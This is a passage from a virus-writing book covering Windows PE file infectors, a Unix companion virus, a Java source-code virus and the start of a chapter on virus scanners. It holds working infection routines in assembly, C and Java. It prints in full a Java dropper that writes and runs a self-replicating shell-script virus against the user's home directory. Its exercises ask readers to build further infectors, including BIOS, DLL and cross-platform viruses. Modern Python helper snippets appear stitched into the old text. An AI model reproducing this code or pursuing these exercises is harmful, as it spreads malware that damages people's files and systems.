right after RTN1.
Another important global technique is to look at conditional
jumps in a routine, and figure out a way to get as many of them as
possible to be short jumps. Thus, for example, rather than coding a
series of jumps like this:
jz IFEX
. . .
jz IFEX
. . .
jz IFEX
. . .
IFEX:
where all might be 6-byte near jumps, one can code them as
jz _IF1
. . .
_IF1: jz _IF2
. . .
_IF2: jz IFEX
. . .
IFEX:
which might change two of them into 2-byte short jumps, or one
might code it as
jnz _IF0
IFEX: . . .
_IF0: . . .
jz IFEX
. . .
jz IFEX
Summary
The Hillary virus shows just how simple it can be to infect a
32-bit Windows program. There are some hurdles to get over in
order to call the Windows API, and learn a new file format, as well
as perhaps learning something about 32-bit coding. However, once
these basic ideas have been understood, infecting a PE style file is
just not that hard. In fact, it would appear to be even easier than
infecting an old DOS EXE file. The concepts behind infecting a file
are nothing different from what we’ve encountered before in deal-
ing with DOS files. Only the mechanics are slightly different.
Exercises
1. Look up the FindNextFile function in your 32-bit Windows references
and trace through it to see how the FIND_NEXT_EXE procedure
should look.
2. Study the Hillary virus and find some ways to make it smaller. How
small can you make it without removing functionality?
3. What if you make Hillary infect at most one file each time it executes?
Can you make it smaller?
4. What happens if the Hillary virus doesn’t modify the VirtualSize in the
Section Header when it infects a file?
Chapter 17
A Multi-Section
Windows Virus
Source Code for this Chapter: \JEZZY\JEZZY.ASM
_IF1:
That puts the virus at the end of the file in the correct number of
blocks. There will be a little miscellaneous data filling the end of
the file, but that is not important. All that remains to be done is to
modify the header, and fix the jump to the host in the virus.
(In the above, SH[j] is the array of section headers.) To get the
VirtualAddress for the .jezzy section, one simply adds Bytes to
the previous section’s VirtualAddress,
SH[jezzy].VirtualAddress=SH[last].VirtualAddress
+Bytes
where VIRUS is the label defining the start of the virus, and HADDR
is the label at the jump instruction,
HADDR: jmp HOST
at the end of the main control routine in the virus. This jump value
is stored to TEMP in memory and written to the infected file at the
location
Old File Size + OFFSET HADDR - OFFSET VIRUS + 1
To this, one must add the total size of the section headers
in the file, plus one more (which is added by the virus):
xor eax,eax
mov ax,[ebp+esi+6] ;actual section count
inc eax ; +1
mov ecx,SEC_SIZE ;size of sec hdrs
mul ecx
add eax,ebx ;eax=size needed
At this point eax contains the total space needed if the infection
process is to be carried out successfully. This number can be
compared to the actual space available in FILEBUF
cmp eax,FB_SIZE ;will it fit buffer?
jnc CINO ;nope, exit with NZ set
Actually this takes a bit of a shortcut and just checks whether the
first four letters of the name are “.jez”, but of course such a
shortcut will never result in a double-infected file. If everything is
okay, the CAN_INFECT procedure returns with Z set, signalling
the INFECT_FILE routine to proceed with the infection.
Exercises
1. Modify Jezebel so that it puts the host code in the .jezzy
section and puts its own code in the .text section. This is as simple
as renaming the sections in the memory image of the header before
writing it back to the host. Does this convey any advantage in
evading virus scanners? What if you rearrange the Section Headers
too? What if you have two .code sections instead?
Chapter 18
A Section-
Expanding Virus
Source for this Chapter: \YELTSIN\YELTSIN.ASM
and reading 12 bytes from there, comparing them with the start of
the virus. If they’re the same, then the virus is assumed to be there
already. This approach is no different than what many DOS-style
viruses use.
_IF1:
raw data size of this section. The code to accomplish this is given
by:
call FIND_LAST_EXEC ;find the last executable code section
jc IFEX ;if there isn’t one, just exit
mov [ebp+SECTION],al ;else store section number here
mov ecx,eax
dec ecx
call GET_SEC_PTR ;set ebx-section header
mov eax,[ebp+ebx+16] ;get orig raw data size for this section
mov [ebp+OLD_RAW],eax ;and save it here
[Figure: a file on disk, showing the Header, the Code section with its padding, a section boundary, and Section B.]
However, the 8192 bytes reserved in memory for this code section
would still be enough room, so none of the sections would have to
be moved around in memory. The loader would just have to put less
padding in the section which it infected. Figure 18.2 illustrates how
the file we are discussing would look on disk and in memory so you
can see how this would work.
However, if you consider another file, which had 4000 bytes
of raw data in the code section, it would occupy 4096 bytes on disk
and 4096 bytes in memory. Adding 1876 bytes to it would require
6144 bytes on disk (the size rounded up to the nearest 512-byte
multiple) and 8192 bytes in memory (the size rounded up to the
nearest 4096-byte multiple). In such a case, the virus would have
to move the sections both on disk and in memory. (It is always the
case that if the sections have to be moved in memory, they will have
to be moved on disk.)
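The rounding in this example is easy to verify. The helper below is a small Python sketch with a hypothetical name, align_up. It rounds a size up to a multiple of an alignment and reproduces the figures quoted above, using the 512-byte and 4096-byte multiples from the text.

```python
def align_up(size: int, alignment: int) -> int:
    """Round size up to the next multiple of alignment."""
    return -(-size // alignment) * alignment


FILE_ALIGN = 512      # on-disk multiple used in the example above
MEM_ALIGN = 4096      # in-memory multiple used in the example above

original = 4000
grown = original + 1876

print(align_up(original, FILE_ALIGN), align_up(original, MEM_ALIGN))  # 4096 4096
print(align_up(grown, FILE_ALIGN), align_up(grown, MEM_ALIGN))        # 6144 8192
```

Whenever the two aligned sizes differ before and after the growth, the sections that follow have to move.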
If a virus can get away with moving things on disk alone, it
faces a much simpler task than if it has to move things in memory.
Once we start moving things in memory, we must be aware that we
[Figure: an infected file in memory and on disk, showing the Header, the Code section with the Virus, and Sections B and C separated by section boundaries.]
Section Header where the virus was placed to reflect the added size
of the virus. It then updates a number of fields in the PE Header,
including the CodeSize, the BaseOfData (if sections must be moved
in memory), and the ImageSize.
Finally, INSERT_VIRUS watches out for the stack. Yeltsin
uses over 8K of stack space so that it has buffers big enough to do
its job efficiently. However, a 32-bit Windows program often only
starts out with a single 4K page of memory allocated for the stack
when the program starts up. To get more stack, the program must
ask the operating system for it. If it fails to, and yet attempts to use
the stack, a page fault is guaranteed to occur. This halts the program
right away. Yeltsin has the option of either requesting this addi-
tional stack space through the operating system after it is up and
running, or of modifying the PE Header in the host so that it gets
more stack when it first starts up. Yeltsin chooses the latter option
since, after all, the PE header is already sitting right there in
memory. This is accomplished by examining the StackCommit
variable in the header, and enlarging it if necessary:
mov eax,WORKSP ;stack space for virus
add eax,4096 ;padding for calls, etc.
call GET_MSIZE ;round up to pg size
cmp eax,[ebp+esi+100] ;comp w/StackCommit
jc IV1
mov [ebp+esi+100],eax ;update as needed
IV1:
Once the code has been inserted, more work must be done, but only
if sections need to be relocated in memory. This determination can
easily be made with GET_VMSIZE:
call MOVE_SECTIONS
call INSERT_VIRUS
call GET_VMSIZE ;do RVAs need update?
or eax,eax ;if eax=0, all is well
jz _IF2 ;update hdr and exit
. ;additional modifications needed
.
.
_IF2:
the sections must be moved in memory. Notice that the first element
in each Image Data Directory entry is an RVA. For example, the
first entry is the RVA of the start of the exported function table, the
second points to the imported function table, and so on. Because
code comes first in the ordinary PE file, most of these will be moved
by the virus, and they must have the return value from
GET_VMSIZE added to them to get them pointing back where they
should. This process is fairly easy. Suppose that ebp+ebx point to
the beginning of an entry in the Image Data Directory. Then code
like this:
call GET_VMSIZE ;get mem adjust in eax
add [ebp+ebx],eax ;add it to the RVA
will adjust the RVA in the Data Directory entry properly. However,
not all RVA’s need to be relocated. The virus has only moved part
of the sections in the file. Some sections—at least the code sec-
tion—will be in the same place they started out at. Thus, Yeltsin
needs a test to determine whether an RVA should be moved or not.
Such a test is easy to come up with. The virus itself will be placed
at a location in memory less than or equal to the lowest RVA of
anything that was moved. Thus, we can compare any RVA to the
RVA of the entry point of the virus—which is now the entry point
of the host—to see if it needs to be adjusted or not. This added test
transforms the above code into
call GET_VMSIZE ;get mem adjust in eax
mov ecx,[ebp+ebx] ;get the RVA in question
cmp ecx,[ebp+esi+40] ;compare with the entry point
jc WRT
add ecx,eax ;adjust if necessary
WRT: mov [ebp+ebx],ecx ;and update the RVA
DAT DB 0AAH
404520: DB 0AAH
Now if the program loader can load this into memory at the
ImageBase of 400000 where it was linked to, it doesn’t need to
adjust anything. However, if it must load the program to location
500000 instead, when it loads, the image will look like this:
5011C4: mov al,[404520]
504520: DB 0AAH
The mov to al will not load it with 0AAH, but with whatever
value is at 404520H in memory, which will be some other program
or some unused area.
The relocation data in the PE file is what tells the program
loader that it must adjust the memory reference to 404520 if it loads
the program to a different memory location than ImageBase. Let’s
take a look at the mov instruction in machine language:
5011C4: A1 00404520
the wrong value. If the virus adjusted the sections 4096 bytes to
accommodate itself, the DAT variable will now be located at
405520H.
Obviously, if the virus does not adjust both the relocation data
and the actual values in the program to be relocated, the infected
program is not going to work correctly. This adjustment process is
carried out by the routine UPDATE_RELOCATIONS.
The first step in adjusting the relocation data is to adjust the
relocation table itself. Relocation data is stored in blocks in the
.reloc section. Each block starts with a header as detailed in Figure
18.3. The VirtualAddress field contains the RVA of the start of a 4
kilobyte block to which the relocations pertain. The SizeOfBlock
tells how big the block is. This header is followed by an array of
words. The number of words in this array can be determined from
SizeOfBlock,
# words = (SizeOfBlock-8)/2
Each word in the array supplies the low 12 bits of the RVA where
the relocation is, and the upper 4 bits are a flag to tell what type of
relocation data is required. The only valid flag values are 3, which
indicates a 32-bit dword relocation, and 0, which indicates that the
entry is just a filler to pad the table to an even number of dwords.
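The block layout described above can be decoded with a short read-only parser. This is a Python sketch with a hypothetical function name. It takes the raw bytes of one relocation block and returns the page RVA together with a (type, offset) pair for each word, using the word count formula given above.

```python
import struct


def parse_reloc_block(data: bytes, offset: int = 0):
    """Decode one relocation block: an 8-byte header plus an array of words."""
    virtual_address, size_of_block = struct.unpack_from("<II", data, offset)
    if size_of_block < 8:
        raise ValueError("SizeOfBlock must include the 8-byte header")
    count = (size_of_block - 8) // 2          # number of words in the block
    words = struct.unpack_from("<%dH" % count, data, offset + 8)
    # Upper 4 bits: relocation type. Lower 12 bits: offset within the page.
    entries = [(w >> 12, w & 0x0FFF) for w in words]
    return virtual_address, entries


# One block for the page at RVA 1000H: a type 3 entry at offset 1C5H,
# followed by a type 0 filler entry.
block = struct.pack("<IIHH", 0x1000, 12, 0x31C5, 0x0000)
print(parse_reloc_block(block))   # (4096, [(3, 453), (0, 0)])
```

The next block, if any, starts SizeOfBlock bytes after the start of this one.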
To relocate data, UPDATE_RELOCATIONS simply scans
through these blocks of relocation data and looks at the
VirtualAddress field in the header. If the VirtualAddress is greater than or
equal to the entry point for the program, it gets updated. If less than,
it is left alone. One needn’t mess with the 12-bit offsets at all in this
phase of fixing the relocations, because they only point to different
addresses within a page of data. When the virus moves sections
around in memory, it does so a whole page at a time. Thus, only the
dword page address needs to be changed.
The second step in fixing the relocation data is to go out to
where the actual vectors in the file reside, and fix them. They are
dispersed throughout the file, and they point all over the file. Since
the virus did not merely move everything up, it must go out and
check every single vector to see if it needs to be adjusted. To
accomplish this, UPDATE_RELOCATIONS goes through the
blocks of relocation data in .reloc and calls a subroutine
PROCESS_BLOCK. This subroutine reads the block of relocation data
into the RELBUF buffer in the stack frame, and it reads the raw data
which this block of relocations refers to into the FILEBUF buffer.
Next, it scans through the 12-bit offsets (which are now offsets into
FILEBUF), and looks at each dword which must be relocated,
adjusting it as necessary. When this process is complete,
PROCESS_BLOCK writes the raw data in FILEBUF back out to the file.
Each dword to be checked is actually an assumed offset in the
32-bit flat segment. To turn this value into an RVA,
PROCESS_BLOCK subtracts the ImageBase from it. Then, the RVA is
compared with the entry point for the program, as usual, and
adjusted accordingly in FILEBUF.
To understand this a bit better, let’s go back to our example
mov instruction,
4011C4: mov al,[404520]
404520: db 0AAH
Let’s suppose Yeltsin moves the .data section by 1000H when it
makes room for itself. Then the data byte 0AAH will be loaded to
405520 in memory by the loader, rather than 404520.
Along with this mov instruction, there will be an entry in the
relocation table. This entry will be in the block with VirtualAddress
1000H, and the word offset will be 31C5H, corresponding to a
relocation type 3 at offset 1C5H.
When Yeltsin adjusts this relocation, it will first look at the
VirtualAddress 1000H, recognize it as lying below the virus, and
leave this header value alone. On the next round, it will load all of
the vectors into memory, along with the block of code containing
the mov instruction. As it scans the relocation vector values, it will
come across the value 404520, which corresponds to RVA 4520H.
Since the virus is below this RVA, it will add the value returned by
GET_VMSIZE (1000H in our example) to 404520H. The result is
405520H. This value is saved back to FILEBUF and subsequently
written to the file.
Now, when the infected file is loaded, everything will come out
right.
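[Figure: an Image Import Descriptor (fields Characteristics, TimeDateStamp, ForwarderChain, Name, FirstThunk) for “USER32.DLL”, followed by a second IID. The Hint Name Array and the Import Address Table both refer to Image Import By Name entries such as 44 “GetMessage”, 72 “LoadIcon”, and 19 “TranslateMessage”.]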
through the IID’s and the Image Import By Name Data to find the
names of the imported functions required by the program. You’ll
notice that the Image Import By Name data is duplicated in the array
pointed to by Characteristics and FirstThunk in the IID.
Characteristics and FirstThunk do not point to the same array, but rather
to two different, parallel arrays. When the loader loads a program
it reads through the array pointed to by FirstThunk and replaces
each entry in the Image Import By Name array with the actual
address of the function it is supposed to reference.
As you will recall, when a call to an imported procedure is made
by a program, it does not code it as
call ImportProc
but rather as
call XJP
this is mainly that it saves the loader a bit of time looking up all the
imported functions when the program is loaded.
Of course, the question arises, what happens when the loader
and the DLL aren’t properly matched? At first, one might think the
program will just transfer calls to imported functions to some
random spot in memory. However, a safety factor has been built
into the program loader so this won’t happen. When a DLL is bound
to a program, its date stamp is placed in the TimeDateStamp field in the
Image Import Descriptor. This date stamp is checked by the loader
before the direct memory addresses are used. If it differs from the
date stamp of the DLL by that name, the direct addresses are not
used—and this is why there are two Image Import By Name arrays.
The array pointed to by Characteristics can still be used to get the
proper import addresses, even when the file has been bound.
Anyway, Yeltsin has to be aware that files can be bound. If they
are, then the array associated to FirstThunk should not be touched
when adjusting RVA’s because it does not contain RVA’s, but
rather absolute addresses. To determine if the array associated to
FirstThunk contains RVA’s, one examines the TimeDateStamp field in
the IID. If TimeDateStamp is zero, the DLL has not been bound. If it is
anything else, it is bound.
Next, both of the Image Import By Name arrays may contain
either RVA’s that point to a hint/name structure, or they may
contain an ordinal number which references the function number
in the DLL. If the high bit of an array entry is set, then the entry is
an ordinal number, and Yeltsin must leave it alone. If that high bit
is not set, the entry is an RVA, and Yeltsin should adjust it
accordingly.
Finally, we should note that the Image Import By Name arrays
are both null terminated, and this is the signal for UPDATE_IIBN
to stop processing an array.
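The two rules above, the high-bit test and the null terminator, can be seen in a short read-only sketch. It is written in Python with a hypothetical function name. It walks an array of dwords until it meets a zero entry and labels each entry as an ordinal or an RVA. It assumes the array has not been overwritten with bound addresses.

```python
import struct

ORDINAL_FLAG = 0x80000000   # high bit set: entry is an ordinal, not an RVA


def classify_thunks(data: bytes, offset: int = 0):
    """Walk a null-terminated array of 32-bit import entries."""
    result = []
    while offset + 4 <= len(data):
        (entry,) = struct.unpack_from("<I", data, offset)
        if entry == 0:                       # null entry terminates the array
            break
        if entry & ORDINAL_FLAG:
            result.append(("ordinal", entry & 0xFFFF))
        else:
            result.append(("rva", entry))    # RVA of a hint/name structure
        offset += 4
    return result
```

Only the entries labeled "rva" refer to locations in the image; the ordinal entries are plain numbers and carry no address.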
and have all of the files available in the current directory. The result
will be YELTSIN.EXE, which may be executed to infect other files.
Exercises
1. Modify Yeltsin to insert itself directly after the raw data in the last code
section so that there is no gap there.
2. Modify Yeltsin so it will not infect files which require the relocation of
sections in memory. Remove everything that is no longer needed. How
big is Yeltsin now? Statistically speaking, what percentage of all
program files should Yeltsin be able to infect?
room for the larger code. The import data goes above these sections,
so they don’t need to be moved to make room for it.
In addition to physically moving the section on disk, the
MOVE_SECTIONS function adjusts the section headers in memory
to reflect the new locations of the sections, both on disk and in their
memory images.
The second part of making room for more import data is to
adjust relative virtual addresses (RVAs) properly wherever they
need to be adjusted throughout the virus. In Yeltsin the test for
whether an RVA needed adjustment was fairly simple. If it referred
to data below the start of the virus (which was the new entry point
of the program) then it was left alone, and if it was above that
address, the amount returned by GET_VMSIZE was added to it:
mov ebx,[RVA] ;get an RVA
cmp ebx,[ebp+esi+40] ;compare w/entry pt
jc NOADJUST ;no adjust necessary
call GET_VMSIZE ;eax=amount to add
add ebx,eax ;adjust the RVA
mov [RVA],ebx ;and save it again
NOADJUST:
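[Figure: file layout before and after MOVE_SECTIONS. The Header and .text stay in place, and the .data, .idata, .rsrc and .reloc sections are moved to leave space for inserting the virus.]
[Figure: layout of the import data, with the labels Host import data, Virus import data, Virus IIDs and 0 terminators.]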
but as
call IFctn
IFctn: jmp DWORD PTR [IMPORT_FUNCTION]
There will never be a reference to this data that does not have a
relocation vector pointing to it, so this solves the problem com-
pletely.
it writes the IID to the file. Once one DLL is complete, the
BUILD_IMPORT_DATA function reads another byte from
INAME_TABLE. If there are more DLLs to be processed, this byte
will be the first character in the name of the next DLL, and if there
are no more DLLs, this byte will be zero.
Once all of the DLLs have been processed, and all of the data
is built in the FILEBUF buffer, it is simply written to disk. The
process of building the data involves lots of calculating RVAs and
the details of this may be seen by examining the source code. With
this complete, all of the import data for the virus is set up. When
the program loader gets hold of the program, it will set up all of the
correct addresses in the Import Address Tables pointed to by the
FirstThunks in the IIDs.
Note that the call here is to an address dynamically built in the ebx
register. Here, IMPORT_FUNCTION is an ordinal that references
which function in this DLL is to be called. If ImportFunction is the
first function in the DLL that we imported, IMPORT_FUNCTION
will be 0, if it is the second, IMPORT_FUNCTION will be 4, and
so on. This provides an index into the Import Address Table. Next,
the number stored in JMPTBL+4*DLL_NUMBER is added to the
address. JMPTBL is an array of dwords, one for each imported
DLL, that is built by the parent virus when the infection is made. It
basically picks out which of the Import Address Tables to use.
Finally edi is added to ebx to account for the possibility that the
program was not loaded at the default Image Base by the program
loader. With the correct address calculated, the function is called.
We should take a closer look at how JMPTBL is set up, as it is
non-trivial. One might think that JMPTBL must simply contain the
RVAs of the Import Address Tables for each DLL that is imported.
However, one must note that edi is being added to ebx in order to
find the proper address to call, and this throws a glitch into things.
We really don’t want to add edi to the RVA of the Import Address
Table. Rather, we want to add the difference between the default
Image Base and the actual base address where the program was
loaded. The edi register will reflect both this change in base and
the fact that the virus does not start at the same RVA in every file.
To make this adjustment, the BUILD_IID function calculates the
expected value of edi for its child if the base isn’t moved, and
subtracts this from the RVA of the desired Import Address Table.
That value is then stored in the JMPTBL. Then, when edi is added
in by the calling function, the part due to the virus changing its RVA
is cancelled out, and the proper address is called.
Finally, Jadis must have a scheme for getting started. The
assembler and linker do not know how to set up all of the variables
needed to make this scheme work on the first generation. The
solution is to keep the old direct jump addresses around, and set the
JMPTBL up to point to them, so that on the first execution the virus
will have something proper to call to import the desired functions.
Note that these functions must be set up in exactly the same order
as they are in the INAME_TABLE, or you won’t get the right
function when performing a call [ebx].
[Figure: export data of NAME.DLL, showing the Function Addresses, Names and Name Ordinals arrays, with name entries such as “Function5” and “Function6”.]
Exercises
1. Design a DLL infector which hooks one of the exported functions by
changing the export address to a function in the virus. To avoid too
much overhead, this function hook must not allow the replication
routines to be called too often if this function happens to be frequently
used.
2. Design a virus which inserts itself at the beginning of the first code
section instead of at the end.
3. Can you imagine a way where a virus might insert itself in the middle
of a code section?
with it, like the GNU C compiler. At the same time, I’ll try to keep
the discussion as implementation independent as possible.
A Basic Virus
One problem with Unix which one doesn’t normally face with
DOS and other PC-specific operating systems is that Unix is used
on many different platforms. It runs not just on 80386-based PCs,
but on 68040s too, on Sun workstations, on . . . . well, you name it.
The possibilities are mind boggling.
Anyway, you can certainly write a parasitic virus in assembler
for Unix programs. To do that one has to understand the structure
of an executable file, as well as the assembly language of the target
processor. The information to understand the executable structure
is generally kept in an include file called a.out.h, or something like
that. However, such a virus is generally not portable. If one writes
it for an 80386, it won’t run on a Sun workstation, or vice versa.
Writing a virus in C, on the other hand, will make it useful on
a variety of different platforms. As such, we’ll take that route
instead, even though it limits us to a companion virus. (Assembler
is the only reasonable way to deal with relocating code in a precise
fashion.)
The first virus we’ll discuss here is called X21 because it
renames the host from FILENAME to FILENAME.X21, and cop-
ies itself into the FILENAME file. This virus is incredibly simple,
and it makes no attempt to hide itself. It simply scans the current
directory and infects every file it can. A file is considered infectable
if it has its execute attribute set. Also, the FILENAME.X21 file
must not exist, or the program is already infected.
The X21 is quite a simple virus, consisting of only 60 lines of
C code. It is listed at the end of the chapter. Let’s go through it step
by step, just to see what a Unix virus must do to replicate.
calls an opendir function to open the directory file, and then one
repeatedly calls readdir to read the individual directory entries.
When done, one calls closedir to close the directory file. Thus, a
typical program structure would take the form
dirp=opendir(".");
while ((dp=readdir(dirp))!=NULL) {
(do something)
}
closedir(dirp);
[Figure: flowchart. Does FILE.X21 exist? If no, copy FILE to FILE.X21, then copy VIRUS to FILE.]
if (!((*lc==’X’)&&(*(lc+1)==’2’)&&(*(lc+2)==1))) {
(do something)
and then makes a copy of itself with the name FILENAME. Quite
simple, really.
The final step the virus must take is to make sure that the new
file with the name FILENAME has the execute attribute set, so it
can be run by the unsuspecting user. To do this, the chmod function
is called to change the attributes:
chmod(“FILENAME”,S_IRWXU|S_IXGRP);
That does the job. Now a new infection is all set up and ready to be
run.
The final task for the X21 is to go and execute its own host.
This process is much easier in Unix than in DOS. One need only
call the execve function,
execve(“FILENAME.X21",argv,envp);
(Where argv and envp are passed to the main c function in the virus.)
This function goes and executes the host. When the host is done
running, control is passed directly back to the Unix shell.
Exercises
1. Can you devise a scheme to get the X21 or X23 to jump across
platforms? That is, if you’re running on a 68040-based machine and
remotely using an 80486-based machine, can you get X21 to migrate
to the 68040 and run there? (You’ll have to keep the source for the virus
in a data record inside itself, and then write that to disk and invoke the
c compiler for the new machine.)
1 Marc LaDue, “When Java Was One: Threats from Hostile Byte Code and Java
Platform Viruses”, available at several sites on the internet. Try www.rstcorp.com.
fast. Anything that could really propagate across the internet would
be such a threat that security considerations would have to be
modified fast. The Morris worm was proof of just how dangerous
an internet virus could be. Its life span was only a couple days, but
in that time period, it infected a major part of the internet and
hogged up all the CPU time on the computers it infected.
Our Java virus is simply a source code virus written in the Java
language, not all that different from the C and Pascal viruses we
looked at a few chapters back. It keeps a verbatim copy of itself in
a constant called src. This constant is generated from an ASCII file
of the virus, JVIRUS.SRC, and then inserted in the source code that
will be compiled, JVIRUS.java.
When JVirus runs, it searches the current directory for files that
have “ .java” in their name:
File lf=new File(“.”); //define director var
String[] flist=lf.list(); //create file list
int si=0;
for (si=0;si<flist.length;si++) {
if (flist[si].indexOf(“.java”)>0) { //look for .java
String is=flist[si];
String id=is;
id=id.concat(“.vir”); //.java.vir
When it finds such a file, it opens it to read, and creates a new file
that ends in “.java.vir” to write to:
FileInputStream fi=new FileInputStream(is);
PrintStream fo=new PrintStream(new FileOutputStream(id));
Then it begins to copy the .java file to the .java.vir file, checking
each line for the two magic strings “public static void main” and
“public static void _main” (notice the underscore before “main”
in the second string).
When JVirus finds the “main” method, it inserts its infection
into the file. To understand how this works, it’s easiest to take a
look at the action of the virus on a simple Java program, hello.java.
The uninfected hello.java looks like this:
class Hello {
class Hello {
_main(argv);
}
}
Note that, like our other source code viruses, JVirus must write
itself to the file it is infecting twice, once as the ascii source code
that will get compiled, and once as a constant array, in order to
preserve the source code. To accomplish this in the most efficient
manner, the virus uses the special character “%” (37) to signal
when to make the switch:
for (int i=0; src[i]!=37; i++) { //stop at ’%’
fo.write(src[i]); //write ascii
k=i;
}
for (int i=0; i<src.length; i++) {
fo.print(src[i]); //write constant string
if (i<src.length-1) {fo.write(44); fo.write(13); fo.write(10);}
}
for (int i=k+2; i<src.length; i++)
fo.write(src[i]); //finish writing ascii
Testing JVirus
You’ll need a Java SDK to play around with JVirus. I used the
Microsoft Java SDK as supplied on the Developer’s Network CDs.
To compile jvirus.java, run
jvc jvirus
JVirus will then infect hello.java and proceed to display the mes-
sage that you have let it loose. If you then inspect hello.java, you’ll
see that it is infected.
/* December 7, 1996 */
/* This Java application infects your UNIX system with a Bourne shell
script virus, homer.sh. homer.sh is kind enough to announce itself
and inform you that “Java is safe, and UNIX viruses do not exist”
before finding all of the Bourne shell scripts in your home directory,
checking to see if they’ve already been infected, and infecting
those that are not. homer.sh infects another Bourne shell script
by simply appending a working copy of itself to the end of that shell
script. */
import java.io.*;
class Homer {
public static void main (String[] argv) {
try {
String userHome = System.getProperty(“user.home”);
String target = “$HOME”;
FileOutputStream outer = new FileOutputStream(userHome + “/.homer.sh”);
String homer = “#!/bin/sh” + “\n” + “#-_” + “\n” +
“echo \”Java is safe, and UNIX viruses do not exist.\"" + “\n” +
“for file in ‘find ” + target + “ -type f -print‘” + “\n” + “do” +
“\n” + “ case \”‘sed 1q $file‘\" in" + “\n” +
“ \”#!/bin/sh\" ) grep ’#-_’ $file > /dev/null" +
“ || sed -n ’/#-_/,$p’ $0 >> $file” + “\n” +
“ esac” + “\n” + “done” + “\n” +
“2>/dev/null”;
byte[] buffer = new byte[homer.length()];
homer.getBytes(0, homer.length(), buffer, 0);
outer.write(buffer);
outer.close();
Process chmod = Runtime.getRuntime().exec(“/usr/bin/chmod 777 ” +
userHome + “/.homer.sh”);
Process exec = Runtime.getRuntime().exec(“/bin/sh ” + userHome +
“/.homer.sh”);
} catch (IOException ioe) {}
}
}
Exercises
1. Write a Java trojan that deploys a simple overwriting COM infecting
virus on a PC, but does not execute the virus.
2 For detailed information on Byte Code, see Java Secrets by Elliotte Rusty Harold
(IDG Books, 1997).
Chapter 22
Many New Techniques
By now I hope you are beginning to see the almost endless
possibilities which are available to computer viruses to reproduce
and travel about in computer systems. They are limited only by the
imaginations of those more daring programmers who don’t have to
be fed everything on a silver platter—they’ll figure out the tech-
niques and tricks needed to write a virus for themselves, whether
they’re documented or not.
If you can imagine a possibility—a place to hide and a means
to execute code—then chances are a competent programmer can fit
a virus into those parameters. The rule is simple: just be creative
and don’t give up until you get it right.
The possibilities are mind-boggling, and the more complex the
operating system gets, the more possibilities there are. In short,
though we’ve covered a lot of ground so far in this book, we’ve
only scratched the surface of the possibilities. Rather than continu-
ing ad infinitum with our discussion of reproduction techniques, I’d
like to switch gears and discuss what happens when we throw
anti-virus programs into the equation. Before we do that, though,
I’d like to suggest some extended exercises for the enterprising
reader. Each one of the exercises in this chapter could really be
expanded into a whole chapter of its own, discussing the techniques
involved and how to employ them.
My goal in writing this book has never been to make you
dependent on me to understand viruses, though. That’s what most
of the anti-virus people want to do. If you bought this book and read
this far, it’s because you want to and intend to understand viruses
Exercises
1. Develop an OS/2 virus which infects flat model EXEs. You’ll need the
Developer’s Connection to do this. Study EXE386.H to learn about the
flat model’s new header. Remember that in the flat model, offsets are
relocated by the loader, and every function is called near. The virus
must handle offset relocation in order to work, and the code should be
as relocatable as possible so it doesn’t have to add too many relocation
pointers to the file.
3. Write a virus which can infect both Windows EXEs and Windows
Virtual Device Drivers (XXX.386 files). Explore the different modes
in which a virtual device driver can be infected (there is more than
one). What are the advantages and disadvantages of each?
4. A virus can infect files by manipulating the FAT and directory entries
instead of using the file system to add something to a file. Essentially,
the virus can modify the starting cluster number in the directory entry
to point to it instead of the host. Then, whenever the host gets called the
virus loads. The virus can then load the host itself. Write such a virus
which will work on floppies. Write one to work on the hard disk. What
are the implications for disinfecting such a virus? What happens when
files are copied to a different disk?
jump can go to the 80x86 virus, while the load does no real harm, and
it can be followed by the Power PC virus. Such a virus isn’t merely
academic. For example, there are lots of Unix boxes connected to the
Internet that are chock full of MS-DOS files, etc.
6. Write a virus that will test a computer for Flash EEPROMs and attempt
to write itself into the BIOS and execute from there if possible. You’ll
need some specification sheets for popular Flash EEPROM chips, and
a machine that has some.
Chapter 23
How A Virus Detector Works
Source code for this chapter: \ANTI\GBSCAN.ASM
\ANTI\GBCHECK.ASM
\ANTI\GBINTEG.PAS
Up to this point, we’ve only discussed mechanisms which
computer viruses use for self-reproduction. The viruses we’ve
discussed do little to avoid programs that detect them. As such,
they’re all real easy to detect and eliminate. That doesn’t mean
they’re somehow defective. Remember that the world’s most successful
virus is numbered among them. Nonetheless, many modern
viruses take into account the fact that there are programs out there
trying to catch and destroy them and take steps to avoid these
enemies.
In order to better understand the anti-anti-virus techniques
which modern viruses use, we should first examine how an anti-vi-
rus program works. We’ll start out with some simple anti-virus
techniques, and then study how viruses defeat them. Then, we’ll
look at more sophisticated techniques and discuss how they can be
defeated. This will provide some historical perspective on the
subject, and shed some light on a fascinating cat-and-mouse game
that is going on around the world.
In this chapter we will discuss three different anti-virus tech-
niques that are used to locate and eliminate viruses. These include
scanning, behavior checking, and integrity checking. Briefly, scan-
ners search for specific code which is believed to indicate the
presence of a virus. Behavior checkers look for programs which do
Virus Scanning
Scanning for viruses is the oldest and most popular method for
locating viruses. Back in the late 80’s, when there were only a few
viruses floating around, writing a scanner was fairly easy. Today,
with thousands of viruses, and many new ones being written every
year, keeping a scanner up to date is a major task. For this reason,
many professional computer security types pooh-pooh scanners as
obsolete and useless technology, and they mock “amateurs” who
still use them. This attitude is misguided, however. Scanners have
an important advantage over other types of virus protection in that
they allow one to catch a virus before it ever executes in your
computer.
The basic idea behind scanning is to look for a string of bytes
that is known to be part of a virus. For example, let’s take the
MINI-44 virus we discussed at the beginning of the last section.
When assembled, its binary code looks like this:
0100: B4 4E BA 26 01 CD 21 72 1C B8 01 3D BA 9E 00 CD
0110: 21 93 B4 40 B1 2A BA 00 01 CD 21 B4 3E CD 21 B4
0120: 4F CD 21 EB E2 C3 2A 2E 43 4F 4D
A scanner that uses 16-byte strings might just take the first 16 bytes
of code in this virus and use it to look for the virus in other files.
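As a minimal sketch of that idea, the search itself is just a substring match over the bytes of a file. The constant below is the first 16 bytes of the listing above; the function names are illustrative and are not taken from GBSCAN.

```python
# First 16 bytes of the MINI-44 listing, used as the scan string.
MINI44_SCAN_STRING = bytes.fromhex("B44EBA2601CD21721CB8013DBA9E00CD")


def find_scan_string(data: bytes, scan_string: bytes = MINI44_SCAN_STRING) -> int:
    """Return the offset of the first match in data, or -1 if absent."""
    return data.find(scan_string)


def scan_file(path: str, scan_string: bytes = MINI44_SCAN_STRING) -> bool:
    """Read a whole file and report whether the scan string occurs in it."""
    with open(path, "rb") as handle:
        return find_scan_string(handle.read(), scan_string) != -1
```

A 16-byte string is short enough to search quickly, though a real scanner has to choose its strings carefully to avoid matching innocent programs.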
But what other files? MINI-44 is a COM infector, so it should
only logically be found in COM files. However, it is a poor scanner
that only looks for this virus in file that have a file name ending
